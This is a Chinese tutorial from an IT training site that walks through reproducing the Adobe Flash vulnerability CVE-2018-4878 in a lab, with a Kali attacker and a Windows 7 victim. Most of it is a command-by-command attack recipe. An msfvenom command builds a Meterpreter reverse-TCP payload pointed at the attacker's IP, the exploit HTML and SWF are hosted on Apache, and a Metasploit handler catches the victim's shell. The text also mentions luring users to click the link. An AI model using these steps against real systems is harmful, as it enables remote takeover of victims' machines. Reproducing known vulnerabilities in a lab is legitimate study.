Flash基础入门之Adobe Flash cve-2018-4878 的漏洞复现
小标 2019-01-24 来源 : 阅读 999 评论 0

摘要:本文主要向大家介绍了Flash基础入门之Adobe Flash cve-2018-4878 的漏洞复现,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。

本文主要向大家介绍了Flash基础入门之Adobe Flash cve-2018-4878 的漏洞复现,通过具体的内容向大家展现,希望对大家学习Flash基础入门有所帮助。

漏洞概述
2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。
***者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打开时便会收到***
此次复现为网页链接的方式进行复现受害者访问我们的flash链接就会被远程代码执行并且直接被getshell
***主机:Kali linux ip:172.16.221.213
受害者主机 window7 ip:172.16.221.247
实验用到的工具会在文章末尾分享
***主机配置
1.首先解压我们用到的文件
unzip CVE-2018-4878-master.zip

2.用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我们选择使用的***载荷
LHOST指定ip地址
LPORT指定监听的端口可任意更改
-f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

(1)查看代码文件
cat code.txt

(2)进入到我们解压用到的文件目录,编辑cve-2018-4878.py文件

修改下面的文件路径

   别忘了保存修改并退出
3.python执行脚本文件
python cve-2017-4878-master.py

ls 查看到生成了两个文件
4.启动Apache服务
(1)service apache2 start
我们可以看到已经启动成功了
(2)将我们上两个文件复制到apache2服务的网页目录
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf

现在我们的***环境基本配置完成,只要受害者访问我的链接就可以直接被远程控制
5.启动armitage:属于图形化的metasploit也方便演示

(1)使用handler监听模块
use exploit/multi/handler
(2)设置***载荷是我们在生成文件的时候所选择的***载荷    
set payload windows/meterpreter/reverse_tcp

set lhost 172.16.221.213 设置***主机的ip
set lport 4444 设置监听端口为4444(我们在用msfvenom生成代码文件是设置的端口)
6.开启监听
exploit

7.windows7安装Adobeflash 28.0 后用浏览器访问//172.16.221.213/exploit.html
   
8.此时我们可以看到Kali linux已经获取到sessions
   
复现完成,此时我们就可以查看一下系统配置

当然你也可以不用此图形化直接用命令行(命令都是一样的)
msfconsole 启动


顺便用shell查看下ip地址
在真实环境下,很多***会基于社会工程学诱导用户点击来达到***的目的,也希望大家小心陌生链接及时升级安全补丁,以免造成损失

以上就介绍了Flash的相关知识,希望对Flash有兴趣的朋友有所帮助。了解更多内容,请关注职坐标常用软件Flash频道!

本文由 @小标 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程